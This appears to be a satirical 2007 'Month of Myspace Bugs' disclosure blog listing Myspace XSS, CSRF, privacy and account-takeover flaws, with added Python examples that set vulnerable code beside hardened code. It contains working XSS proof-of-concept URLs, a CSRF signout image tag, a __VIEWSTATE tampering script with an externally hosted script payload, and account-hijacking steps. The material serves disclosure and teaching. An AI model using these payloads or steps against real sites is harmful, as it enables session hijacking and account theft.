momby cartel

MOMBY-00010100: Myspace Bug Potpourri

Advisory MOMBY-00010100: Myspace Bug Potpourri
Noobz: .*
LOLz: .*
0wnz: .*

Today is the last day of the Month of Myspace bugs. We disclosed 19 bugs this month, about 14 of which were fixed within a day or two of publication, which demonstrates two interesting facts: a) the Myspace web design and security groups can fix bugs if they care to, and b) the Myspace web design and security groups tend to fix bugs if they're presented in an easy to read and high profile "Month of" format.

Anyway, here's the rest of the submissions that we didn't get to, in glorious unedited plain text. That means that we do not offer any sort of advice on how to reproduce these, nor do we offer any sort of independent validation on the quality of the bugs, or even so much as a spellcheck.

Thanks to MustLive, rMrGvG, Awesome AnDrEw, RSnake, teh_commodore, Synthetic, and everyone else, credited or not, for submitting bugs. We, quite literally, wouldn't have done it without you! And also thanks to Six Apart and the wonderful staff at LiveJournal for taking this all in stride and not being giant dicks. Extra thanks to rMrGvG for translating for my favorite people on Earth, the Mighty Spaniards, originators of the deadliest flu bug ever seen!

Finally, thanks to the readers, especially the haters. You guys made us laugh, and laugh, and laugh. April Fools, suckers!

NEXT MONTH: MONTH OF NO MONTH OF BUGS


MOMBY-00010100a: Myspace Flag Overlay Spammer Trick

Credit: Technocrat

MOMBY-00010100b: Myspace Unprintable Password Permanent Account Control

Credit: Awesome AnDrEw

MOMBY-00010100c: Myspace Embedded Flash Javascript/ActionScript XSS

Credit: Lonewolf / OwnedSpace

MOMBY-00010100d: Myspace Profile Redirect

Credit: Tymm

MOMBY-00010100e: Myspace Permanent Message Archival

Credit: c

MOMBY-00010100f: Myspace MP3 theft

Credit: Spas

MOMBY-00010100g: Myspace Jobs Search Locale XSS

Credit: rMrGvG

MOMBY-00010100h: Myspace Groups HTML Element Injection

Credit: rMrGvG

MOMBY-00010100i: Myspace Profile HTML Element Injection

Credit: rMrGvG

MOMBY-00010100j: Myspace Bulletin HTML Insertion

Credit: rMrGvG

MOMBY-00010100k: Myspace Blog Background Image XSS

Credit: Paul_Smells aka Sinclair

MOMBY-00010100l: Myspace mp3downloader MP3 Theft

Credit: Jon

MOMBY-00010100m: Myspace mp3downloader MP3 Theft

Credit: Awesome AnDrEw

MOMBY-00010100n: Myspace Random Image Viewer

Credit: skinnyCorp

MOMBY-00010100o: Myspace Profile Reset

Credit: Anonymous

MOMBY-00010100p: Myspace Preferred Language Reset

Credit: Anonymous

MOMBY-00010100q: Myspace Domain Generalization Design Error

Credit: Wladimir

MOMBY-00010100r: Myspace Patched XSS

Credit: rMrGvG

MOMBY-00010100s: Myspace Shouthacking Vector

Credit: Anonymous

MOMBY-00010100t: Myspace CSS "@import" XSS

Credit: luoluo

MOMBY-00010100u: Myspace Messaging XSS

Credit: rMrGvG

MOMBY-00010100v: Myspace Messaging XSS

Credit: TX

MOMBY-00010100x: Myspace Instant Messenger Unfiltered Flash

Credit: Awesome AnDrEw

MOMBY-00010100y: G4TV Month Of Myspace Bugs Article XSS

Credit: Mondo Armando

MOMBY-00010100z: Unknown Myspace Vulnerability

Credit: Unknown

MOMBY-00010100!: Unproven Myspace Undeletable Comment

Credit: Anonymous

MOMBY-00010100@: Myspace Top Friends Bug

Credit: Anonymous

MOMBY-00010100#: Myspace MYUSERINFO Alteration (User Impersonation)

Credit: Anonymous

MOMBY-00010100$: Myspace Message Privilege Violation

Credit: Anonymous

MOMBY-00010100%: Myspace Vulnerable Feeling Form

Credit: Anonymous
momby cartel

MOMBY-00010011: Pimp-My-Profile "Hide Friends" Information Disclosure

Advisory MOMBY-00010011: Pimp-My-Profile "Hide Friends" Information Disclosure
Noobz: ***********
LOLz: ******
0wnz: *

Third party skinning service Pimp-My-Profile.com offers thousands of pre-designed Myspace profile styles (as well as misleading phishing links dressed up as eBay, for some reason). Most of these profile overlays can be "tweaked" to "hide" portions of Myspace profiles -- in particular, there is a "Hide Friends" button. Users generally hide friends in the mistaken belief that a hidden friends pane prevents others from learning who their friends are. For example, some users rely on the Pimp-My-Profile.com functionality to conceal "Cyber" romantic relationships from "Real Life" partners, to hide "unprofessional" associations from potential employers, and so on (as shown by first-hand anecdotal experience). The overlay only hides the pane on the profile page itself; the friend list is still served by Myspace, and other Myspace pages render it without the overlay.

However, by viewing the user's personal information via the "viewfriends" application on friends.myspace.com, it is in fact trivial to learn such hidden relationships. An example is shown below.

Howto: change 'profile' to 'friends' in the URL where indicated.

Screenshot: profile with the friends pane hidden
Screenshot: viewfriends page for the same profile (one friend shown)


It's worth stressing three features of this bug: 1) This is a third-party service presumably unrelated to Myspace. 2) Regardless, this bug affects the usability of the Myspace service -- if users were better informed of this information disclosure, they would not likely rely on the "Hide Friends" functionality to conceal relationships, and 3) This was in fact the bug that prompted the MOMBY Institute to pursue this ridiculous Month of Bugs.

Credit: This bug was first reported by Voodoo Woman, a confessed Myspace loser who enjoys stalking even the most casual of acquaintances on the Internet and compiling detailed dossiers of their lives and associations.

begin boring-rant.txt 644

When learning of this bug, we realized that there would be at least several thousand typical Myspace users who may be concerned about this sort of information disclosure attack -- many more than would be concerned about a null pointer dereference, a local-only privilege escalation in Mac OS X, or a double-free in PHP4. While these other bugs, and even some XSS bugs detailed here at MOMBY, are more closely associated with information security, there is about zero common interest in these issues outside of a small, highly-trained circle of professional attackers and defenders. On the other hand, Myspace is simultaneously a common reference implementation of poor web application design, and one of the most popular and useful destinations in the history of the Internet. This is paradoxical to technical professionals, and the security set seems to be suffering a serious bout of cognitive dissonance on this point. Kids (12 to 24 year olds) are learning their Internet habits on Myspace -- that means cleartext authentication, random errors and re-logins, mysterious loss of data and privileges, and easy XSS-enabled session hijacking are pretty much the sum total of their day-to-day experience.

We, as a defense industry and as a force for good, should be doing so much more to help them understand, even a little bit, what Good Security looks like. That's what MOMBY is all about.

Also, we really, really hate the other Months of Bugs, run by self-obsessed security douches all. And that is really what MOMBY is all about.

Also, we are ourselves self-obsessed security douches. And THAT is what MOMBY is all about.
momby cartel

MOMBY-00010010: Video Upload "title" Image Alt Text Error

Advisory MOMBY-00010010: Video Upload "title" Image Alt Text Error
Noobz: ******
LOLz: ***
0wnz: ?

Myspace allows users to upload video content to be aggregated and ultimately viewed by other Myspace users. Due to a problem in input validation on the "title" variable for the "metaForm" portion of the video upload application, it is possible for an attacker to cause input to be displayed outside the resulting alt parameter of the video's icon image.

Though this is certainly a bug, it does not appear to be exploitable by the feeble minds of the MOMBY! Cartel, because Myspace correctly filters the usual XSS elements (<script> tags, event handlers, style expression()s and the like) and most other HTML elements as well. Perhaps the most interesting feature of this bug is that Myspace is clearly and deliberately defending against malicious use of this field, yet still fails to escape a user-supplied "> sequence: a blacklist of bad tags is standing in for attribute encoding, and the attribute boundary is exactly what a tag blacklist does not cover.

Screenshot: http://pics.livejournal.com/momby/pic/0000rqg1

Credit: rMrGvG of SNI-LABS first reported this bug. He reported it early on in MOMBY, so it's quite possible this was an exploitable condition then. Regardless, basic failure to escape user input is still a bug today.
momby cartel

MOMBY-00010001: Clickable "numberPagesBack" XSS

Advisory MOMBY-00010001: Clickable "numberPagesBack" XSS
Noobz: ****
LOLz: **
0wnz: **

The action handler for the "Email Customer Service" form at http://collect.myspace.com/index.cfm?fuseaction=misc.contactInput contains a clickable cross-site scripting (XSS) vulnerability. The resulting page from submitting a message builds its content from parameters collected from the URI. The two parameters of note are highlighted here (url broken for readability):

http://collect.myspace.com/index.cfm?page=none&emailAddress=[[ERROR
0000011c EMAIL ADDRESS NOT ENTERED]]
&fuseaction=misc.contactConfirm
&numberPagesBack=0);alert('cookie theft '%2bdocument.location);//

Screenshot: http://pics.livejournal.com/momby/pic/0000pzyx

Similar to MOMBY-1100, this link must be clicked by a victim in order to be effective for an attacker. Unlike MOMBY-1100, however, victims need not be authenticated, which lowers the relative value of the attack; victims are not guaranteed to possess useful session information. On the gripping hand, the attacker does have some freedom to alter the emailAddress parameter in order to further persuade a victim to click on the presented "return to fix errors" link. For example, the attacker could present a false form for e-mailing Myspace customer service about something compelling, then intentionally alter the user's provided e-mail address with an engineered onSubmit() "hiccup" action immediately before loading the XSS-injected page. Victims, in turn, are more likely to believe that the presented "results" really do require them to reenter information.

Credit: This bug was first reported by Synthetic.

momby cartel

MOMBY-00010000: Myspace Cross-Site Request Forgery (CSRF) Signout

Advisory MOMBY-00010000: Myspace Cross-Site Request Forgery (CSRF) Signout
Noobz: ** 1/2
LOLz: *********
0wnz: * 1/2


Due to a lack of Referer checking or other form of validation, an attacker may arbitrarily cause Myspace users to end their sessions.

Ultimately, an attacker needs to get a user's browser to request the following URL: http://collect.myspace.com/index.cfm?fuseaction=signout. Because nothing checks where that request came from, any request the browser makes will do, including background requests for embedded resources. For example, an attacker can configure his own web server to answer 404 errors with a redirect to the signout URL, then embed a non-existent image from that server; the browser follows the redirect, sends the Myspace session cookie along with it, and the GET ends the session.

Example tag: A tag such as <img src="http://momby.phpnet.us/myspace/noimageforyou.jpg"> may be embedded throughout user-controlled areas, and may be targeted to particular users through blog comments, messages, etc.

It's important to note that automated log outs are not the only application of CSRFs.
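The request the image trick produces, next to the checks that stop it, as an added Python example (ours for this page, not Myspace's code). The requests are constructed here, and the endpoint path, cookie name and token field are assumptions; the Apache directive quoted in the comment is our assumed content for the .htaccess mentioned in the credit, not a copy of it.

```python
"""Added example for MOMBY-00010000; not Myspace's code. The requests are
constructed, and the endpoint path, cookie name and token field are assumptions."""
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "http://collect.myspace.com"
SIGNOUT_PATH = "/index.cfm?fuseaction=signout"
SESSION_COOKIE = "session"                      # assumed cookie name


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def signout_as_found(req: Request) -> bool:
    """The behaviour the advisory describes: any request for the signout URL
    that carries a session cookie ends the session. Browsers attach the
    cookie to every request for the site, including one made for an <img>."""
    return req.path == SIGNOUT_PATH and SESSION_COOKIE in req.cookies


def signout_hardened(req: Request, session_token: str) -> bool:
    """Three independent checks; any one of them stops the image trick."""
    if req.path != SIGNOUT_PATH or SESSION_COOKIE not in req.cookies:
        return False
    # 1. State changes only on POST. An <img> or a redirect can only make a GET.
    if req.method != "POST":
        return False
    # 2. Origin (or, failing that, Referer) must be our own site. The attack
    #    arrives with the attacker's page as Referer, or with none at all.
    source = req.headers.get("Origin") or req.headers.get("Referer", "")
    if source != SITE_ORIGIN and not source.startswith(SITE_ORIGIN + "/"):
        return False
    # 3. A per-session anti-CSRF token that a cross-site page cannot read.
    return hmac.compare_digest(req.form.get("csrf_token", ""), session_token)


SESSION_TOKEN = secrets.token_hex(16)   # would be minted at login and stored with the session


def image_triggered_request() -> Request:
    # What the victim's browser sends after <img src="http://momby.phpnet.us/myspace/noimageforyou.jpg">
    # 404s and the attacker's server answers with a redirect. The Apache line that
    # does that (assumed contents of the .htaccess linked in the credit) is:
    #   ErrorDocument 404 http://collect.myspace.com/index.cfm?fuseaction=signout
    return Request("GET", SIGNOUT_PATH,
                   headers={"Referer": "http://momby.phpnet.us/myspace/"},
                   cookies={SESSION_COOKIE: "abc123"})


def legitimate_signout_request() -> Request:
    # The user clicks the real Sign Out control on a Myspace page.
    return Request("POST", SIGNOUT_PATH,
                   headers={"Origin": SITE_ORIGIN},
                   cookies={SESSION_COOKIE: "abc123"},
                   form={"csrf_token": SESSION_TOKEN})
```

Of the three checks, the Referer one is the weakest (some proxies and privacy tools strip the header), which is why the token carries the decision; on a modern site the SameSite cookie attribute, which did not exist in 2007, would keep the cookie off the image request in the first place.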

Credit: AwEsOmE AnDrEw reported specifically the .htaccess-enabled attack in order to silently log out users, and earned a pile of extra LOLs thanks to this vector (to read the specific .htaccess syntax provided, see http://momby.phpnet.us/myspace/.htaccess).
momby cartel

MOMBY-110100100

Dude.

It's been 420 all day.

I had this really great bug to post. It was really funny. But damn if I didn't totally forget it.

Oop, Spongebob is on. Gotta go.

Dude.
momby cartel

MOMBY-00001111: Myspace FriendsView.aspx "__VIEWSTATE" POST XSS

Advisory MOMBY-00001111: Myspace FriendsView.aspx "__VIEWSTATE" POST XSS
Noobz: **
LOLz: ****
0wnz: *** 1/2


An interesting find, this is an Ajax control present on all "View Friends" pages. Useful for POST-based XSS attacks (which will usually require a form posted off-site in order to trigger), this vulnerability will be exercised in a fashion similar to MOMBY-1001.

First, a simplified attack form for demo purposes:


This can of course be modified to be a one-click or onLoad submit action, requiring only the page to load in the victim's browser. Screenshot of the above form in action: http://pics.livejournal.com/momby/pic/0000hw8z

In order to modify the vulnerable parameter, some base64 encoding and decoding is required. This is easily accomplished with many b64 encoders, one of the easiest to use being the online encoder at http://www.motobit.com/util/base64-decoder-encoder.asp. An attacker may take the __VIEWSTATE value, decode and save the binary, and edit the section at offset 0xdb using his favorite hex editor. This is a standard TLV (type-length-value) node, which supplies the text displayed in the Friends header box, such as |05 10|Tom's Friends... (|05| being type, |10| being length decimal 16, the length of "Tom's Friends...")

Once that's complete, the attacker re-encodes the resulting file back to a single-line base64 string, and voila! An exploit that is not only completely unfiltered at Myspace.com, but is basically invisible to any other means of detection, such as third-party XSS-filtering proxies or browser add-ons: the payload travels base64-encoded inside an opaque POST field that such filters have no reason to decode (the stealth is worth at least half an 0wn right there). The fix on the Myspace side is the standard one: enable view state MAC validation so that a tampered blob is rejected before its contents are ever rendered; that a hand-edited blob is accepted at all implies the MAC is not being checked on this page.

This form and its related Ajax cousins are a rich area of unfiltered exploitation, as it is not an obvious vector for most casual XSS bug-hunters. We here at M.O.M.B.Y! hope the original reporter will take a moment to explain further his methodology in finding this bug using the anonymous comment section of this journal.

Note, though, the length prefix: a single byte here, which looks like a hard limit of 127 characters. In fact the .NET serializer writes string lengths as a 7-bit variable-length integer (high bit set on every byte but the last), so a payload longer than 127 bytes simply needs a two-byte length prefix. Either way, there's plenty of room for evil; recall that elements referenced from other sites (such as <script src="www.example.com/whatever.js">) are run in the same context as the originating page, so complex scripts need not fit inside the view state at all.
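The decode, edit and re-encode steps described above, as an added Python example (ours, not the reporter's tooling or any Myspace code). The blob is constructed to match the shape the advisory describes (a type-05 string node at offset 0xdb with a 0x10 length and the text "Tom's Friends..."); a real __VIEWSTATE has other nodes around it. It goes one step past the text in handling the length prefix as a 7-bit variable-length integer, so values longer than 127 bytes get a two-byte prefix rather than being impossible.

```python
"""Added example for MOMBY-00001111; ours, not the reporter's tooling or
any Myspace code. The blob below is constructed to match the shape the
advisory describes; a real __VIEWSTATE has other nodes around it."""
import base64

TOKEN_STRING = 0x05          # the "type" byte shown before "Tom's Friends..."


def write_7bit(n: int) -> bytes:
    """Length prefix as the .NET serializer writes it: seven bits per byte,
    high bit set on every byte except the last. 16 -> 10, 200 -> c8 01."""
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def read_7bit(buf: bytes, pos: int) -> tuple:
    """Inverse of write_7bit; returns (value, position just after the prefix)."""
    n = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        n |= (b & 0x7F) << shift
        if b < 0x80:
            return n, pos
        shift += 7


def string_node(text: str) -> bytes:
    """Type byte, 7-bit length, UTF-8 value: the TLV node from the advisory."""
    data = text.encode("utf-8")
    return bytes([TOKEN_STRING]) + write_7bit(len(data)) + data


def decoded(viewstate_b64: str) -> bytes:
    return base64.b64decode(viewstate_b64)


def header_at(viewstate_b64: str, offset: int) -> str:
    """Read the string node at offset, e.g. the Friends header text at 0xdb."""
    blob = decoded(viewstate_b64)
    if blob[offset] != TOKEN_STRING:
        raise ValueError(f"no string node at offset {offset:#x}")
    length, start = read_7bit(blob, offset + 1)
    return blob[start:start + length].decode("utf-8")


def replace_string_node(viewstate_b64: str, offset: int, new_text: str) -> str:
    """The hex-editor step: decode, swap the node's value (recomputing the
    length prefix), re-encode to a single base64 line for the form field."""
    blob = decoded(viewstate_b64)
    if blob[offset] != TOKEN_STRING:
        raise ValueError(f"no string node at offset {offset:#x}")
    old_len, start = read_7bit(blob, offset + 1)
    patched = blob[:offset] + string_node(new_text) + blob[start + old_len:]
    return base64.b64encode(patched).decode("ascii")


# Constructed stand-in: 0xdb bytes of filler, the header node, more filler.
FILLER = b"\x00" * 0xDB
ORIGINAL_VIEWSTATE = base64.b64encode(
    FILLER + string_node("Tom's Friends...") + b"\x00" * 16).decode("ascii")

# The advisory's point about scripts fetched from elsewhere: this fits easily.
PAYLOAD = '<script src="http://www.example.com/whatever.js"></script>'
```

The offset check matters in practice: if the node at 0xdb is not a type-05 string, the blob is from a different page or control, and splicing into it blindly produces garbage the server rejects.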

Credit: Richtr first reported this bug. He also claims that forms such as these may be embedded in a personal profile Friends page, implying that this can be used to launch an XSS worm. We haven't tested this.
momby cartel

MOMBY-00001110: Careless Myspace Credential Theft (And comedianJoin XSS)

MOMBY-00001110: Careless Myspace Credential Theft (And comedianJoin XSS)
by special guest advisory author, teh_commodore
n00bz: *******
LOLz: *******
0wnz: .0375

Just like all other bugs posted so far, this one relies on the user almost voluntarily revealing their authentication credentials. Troll livejournal accounts, and look for someone's authentication credentials. This may be in the form of a screenshot of some supposed hack or bug.

Screenshot: http://pics.livejournal.com/momby/pic/0000e7d1

From here, type in the user's credentials at myspace and there you have it. Sub-bug, Myspace doesn't send out an e-mail to the user when they go to change their password. You can do it all right there without any further intrusion necessary.

Screenshot: http://pics.livejournal.com/teh_commodore/pic/000049ct

Link: http://www.myspace.com/mombysux

This is the account set up by the MOMBY boys for their previous advisory. Don't believe me? Look here.

Screenshot Numero 00000010: http://pics.livejournal.com/teh_commodore/pic/00003z77

Unfortunately, once the user recovers his or her password, which will be the one you changed it to, they can regain control of their account. No worries though, if you can get to their e-mail account via the previous bug, you can change the e-mail account to which the myspace account is tied. This moves the 0wnz up to **.

To further specify the flaw, the real account hack comes with changing the e-mail address tied to the account you now have temporary control over. This changes temporary control to permanent, at least until the user gets the Myspace secret police involved (more on this later). To change the e-mail address, Myspace requires you to enter a randomly (?) generated code that was e-mailed to your current e-mail account.

Screenshots: http://pics.livejournal.com/teh_commodore/pic/00006h8h

http://pics.livejournal.com/teh_commodore/pic/00005qwh

If this e-mail is also intercepted, the attacker can now change the e-mail address of the account to their e-mail address. This means full account access and relatively permanent control.

Now to the Myspace response to stolen accounts. In order to return control of someone's account back to them, Myspace requires a "salute" from the person whose account was stolen. A salute is a picture of that person holding a sign with the friend ID on it.

I'm not clear what happens with the salute, or how it helps anything, but I do have a guess. The only thing that makes sense is if they plan to match the face in the "salute" to the pictures posted on the target account. If that's the case, then all one would have to do is delete all pictures of the target from the account. This is all speculation.

This is, of course, unless the changes are "obviously cruel/false," in which case Myspace at least suggests that they will move faster, and without the need of a "salute".

Point is, once an attacker has complete control of someone's account, by linking the account to their e-mail instead of the original user's, the entire process required for the user to regain control is very long and arduous. So an attacker could have the fake account for several days/weeks before anything is done.

Credit: Teh_Commodore.

MOMBY Addendum: Thanks for the excellent writeup, Teh_Commodore! Hope you don't mind that we mashed up the two posts together and altered the title a bit (yours was a little long). Since you went to all this effort to prove how lame we are, we felt that we should promote this to a proper journal entry. Again, thanks for your hard work! You showed us!

Bonus Bug: In addition to teh_commodore's bug, we'd like to also disclose a form-based XSS at http://signup.myspace.com/index.cfm?fuseaction=comedianJoin.step1verify, which is the POST action for the http://signup.myspace.com/index.cfm?fuseaction=comedianJoin web application. The "password" and "passwordConfirm" variables do not apply any filtering to HTML elements, including <script> tags. This is easily demonstrated by entering ">0wned as a password. Screenshot: http://pics.livejournal.com/momby/pic/0000fpb3. Credit for this goes to MustLive. Bonus 0wnz: +2 stars.
momby cartel

MOMBY-00001101: Cleartext Password Recovery via E-Mail

Advisory MOMBY-00001101: Cleartext Password Recovery via E-Mail
Press Embargo until April 17, 2007
Rankings:

Noobs: *****
 LOLs: **
 0wnz: ** 1/2

In MOMBY-111 we discussed the cleartext authentication via the web interface. So, perhaps it's unsurprising to find cleartext passwords being revealed in the e-mail generated when clicking the "Forgot your password?" link on http://www.myspace.com.

Screenshot: http://pics.livejournal.com/momby/pic/0000e7d1

Due to this implementation bug, parties in a position to intercept e-mail are also in a position to recover Myspace passwords. Note also what it implies about storage: a site can only mail back the current password if it keeps passwords in a recoverable form rather than as a salted hash, so a compromise of the password database would expose them too.

One may argue that people who operate e-mail in a cleartext manner have more to worry about. But recall that anyone may trigger this cleartext password reveal; thus, an attacker who may watch cleartext e-mail exchanges (again, most commonly an eavesdropper who is listening on a public wireless segment) may induce a password revelation at will. He need not wait for his victim to log in to Myspace, but may instead wait for the victim to fetch e-mail over a cleartext channel (such as Yahoo! webmail), which in this setting may happen considerably more often.

Also note, Fox Interactive does not inform Myspace users when their passwords have been revealed in this way. Thus, an attacker who has complete control over a mail account (such as an untrustworthy mail administrator or a government investigator), may induce the password reveal, intercept the message, then delete the message, without the victim's knowledge.
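The two flows side by side, as an added Python example (ours for this page, not Myspace's code): the mail-the-password-back behaviour this advisory describes, and a token-based reset that can be sent over the same untrusted e-mail channel. The user records, the outbox and the reset URL are stand-ins constructed for the example.

```python
"""Added example for MOMBY-00001101; not Myspace's code. User records, the
outbox and the reset URL are stand-ins constructed for the example."""
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60   # seconds a reset link stays valid


def derive_hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


# --- the flow as found: the password is mailed back in the clear ---
# (Only possible because the site keeps passwords in recoverable form.)
WEAK_USERS = {"tom@example.com": {"password": "hunter2"}}   # constructed record


def forgot_password_as_found(email: str, outbox: list) -> None:
    """Anyone can trigger this for any address; the owner is never told."""
    rec = WEAK_USERS.get(email)
    if rec is not None:
        outbox.append((email, f"Your Myspace password is: {rec['password']}"))


# --- hardened flow: short-lived, single-use token; a notice when it is used ---
class PasswordResets:
    def __init__(self, users: dict, now=time.time):
        self.users = users      # email -> {"salt": bytes, "hash": bytes}; no cleartext kept
        self.pending = {}       # email -> (sha256(token), expiry)
        self.now = now          # injectable clock so expiry can be tested

    def request(self, email: str, outbox: list) -> None:
        # Same (empty) response for unknown addresses: no account enumeration.
        if email not in self.users:
            return
        token = secrets.token_urlsafe(32)
        # Only the token's hash is stored, so reading the database yields no usable links.
        self.pending[email] = (hashlib.sha256(token.encode()).digest(), self.now() + TOKEN_TTL)
        outbox.append((email,
            "Someone asked to reset your Myspace password. If that was you, visit "
            f"https://example.com/reset?token={token} within 15 minutes. "
            "If it was not, ignore this message; your password has not changed."))

    def complete(self, email: str, token: str, new_password: str, outbox: list) -> bool:
        entry = self.pending.get(email)
        if entry is None:
            return False
        token_hash, expires = entry
        presented = hashlib.sha256(token.encode()).digest()
        if self.now() > expires or not hmac.compare_digest(token_hash, presented):
            return False
        del self.pending[email]                      # single use
        salt = secrets.token_bytes(16)
        self.users[email] = {"salt": salt, "hash": derive_hash(new_password, salt)}
        # The owner learns that it happened, unlike the flow as found.
        outbox.append((email, "Your Myspace password was just changed. "
                              "If this was not you, contact support."))
        return True

    def check_password(self, email: str, password: str) -> bool:
        rec = self.users.get(email)
        return rec is not None and hmac.compare_digest(rec["hash"], derive_hash(password, rec["salt"]))
```

The link still crosses the same cleartext channel, but an eavesdropper now gets a fifteen-minute, single-use window instead of a password that works until the user happens to change it, the account owner is told when a reset goes through, and nothing the site stores (hashed passwords, hashed tokens) is worth mailing in the first place.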

Credit: Dammit, now you know my awesum password!!!

momby cartel

MOMBY-00001100: Clickable "returnPath" XSS

Advisory MOMBY-00001100: Clickable "returnPath" XSS
Press Embargo until April 16, 2007
Rankings:

Noobs: ****
 LOLs: **
 0wnz: **

A pretty straight-forward XSS advisory for today. By supplying a user-defined value to the returnPath variable of the messageboard.posted application, attackers may supply a clickable javascript (or apparently any other protocol handler) URI.

The challenge is to make this useful for an attacker. This would likely involve some measure of social engineering to convince the victim to actually click on the "Back to Forum" link. Alternatively, an attacker could take advantage of an origin violation browser bug to automatically click on the link on the user's behalf.

Example link: http://forum.myspace.com/index.cfm?fuseaction=messageboard.posted
&returnPath=javascript:alert('aw%20yeah%20thx%Synthetic!');

Unlike most of our other XSS advisories, this link will only work correctly if the victim is already logged in; thus, a cookie-stealing attack, in this case, is guaranteed to have immediately usable results.

Screenshot: http://pics.livejournal.com/momby/pic/0000d19t
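The three XSS contexts from this advisory and the earlier MOMBY-00010010 and MOMBY-00010001, as one added Python example (ours for this page, not Myspace's code): an HTML attribute (the video icon's alt text), a JavaScript expression (numberPagesBack) and a URL attribute (returnPath), each rendered the way the bugs suggest and then the way that closes them. The templates, the page-count range and the allowed host list are assumptions; only the contexts and the payload shapes come from the advisories.

```python
"""Added example for MOMBY-00010010, MOMBY-00010001 and MOMBY-00001100.
Not Myspace's code: the templates are stand-ins, only the injection
contexts come from the advisories."""
import html
from urllib.parse import urlsplit

# 1. HTML attribute context: the uploaded video's "title" becomes the icon's alt text.


def video_icon_unsafe(title: str) -> str:
    # A tag blacklist of the kind the advisory describes: script tags and
    # event handlers are stripped, but quotes are left alone, so "> still
    # closes the attribute and the rest of the value lands in the page.
    cleaned = title.replace("<script", "").replace("onerror", "").replace("onload", "")
    return f'<img src="/icons/video.gif" alt="{cleaned}">'


def video_icon_safe(title: str) -> str:
    # Attribute encoding: " becomes &quot; and > becomes &gt;, so the value can
    # never leave the attribute no matter what the blacklist missed.
    return f'<img src="/icons/video.gif" alt="{html.escape(title, quote=True)}">'


# 2. JavaScript expression context: numberPagesBack pasted into history.go().
#    (Assumed template; the advisory only shows that 0);alert(...);// works.)


def back_button_unsafe(number_pages_back: str) -> str:
    return (f'<a href="#" onclick="history.go(-{number_pages_back});return false;">'
            "return to fix errors</a>")


def back_button_safe(number_pages_back: str) -> str:
    # A page count is an integer. Parse it as one and reject everything else;
    # no amount of encoding makes a string safe to drop into a script expression.
    n = int(number_pages_back)          # ValueError for "0);alert(...)//"
    if not 0 <= n <= 20:                # assumed sane range
        raise ValueError("numberPagesBack out of range")
    return f'<a href="#" onclick="history.go(-{n});return false;">return to fix errors</a>'


# 3. URL attribute context: returnPath becomes the "Back to Forum" href.

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"forum.myspace.com"}   # assumption: the forum's own host


def back_link_unsafe(return_path: str) -> str:
    # Attribute encoding is applied and is not enough: javascript:alert(1)
    # contains nothing that needs encoding, so the javascript: URI survives.
    return f'<a href="{html.escape(return_path, quote=True)}">Back to Forum</a>'


def back_link_safe(return_path: str) -> str:
    # Allow-list the scheme and host; anything else falls back to the site root.
    parts = urlsplit(return_path)
    if parts.scheme:
        if parts.scheme not in ALLOWED_SCHEMES or parts.netloc.lower() not in ALLOWED_HOSTS:
            return_path = "/"
    elif not return_path.startswith("/") or return_path.startswith("//"):
        return_path = "/"
    return f'<a href="{html.escape(return_path, quote=True)}">Back to Forum</a>'
```

The point of the third case is that encoding and validation are different defences: the href is already attribute-encoded in back_link_unsafe and the javascript: URI goes through untouched, because the problem is the scheme, not any character in it.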

Credit: Synthetic, who upon reflection has decided that listing a Myspace page as a contact point in a Myspace security advisory may not have been the wisest decision.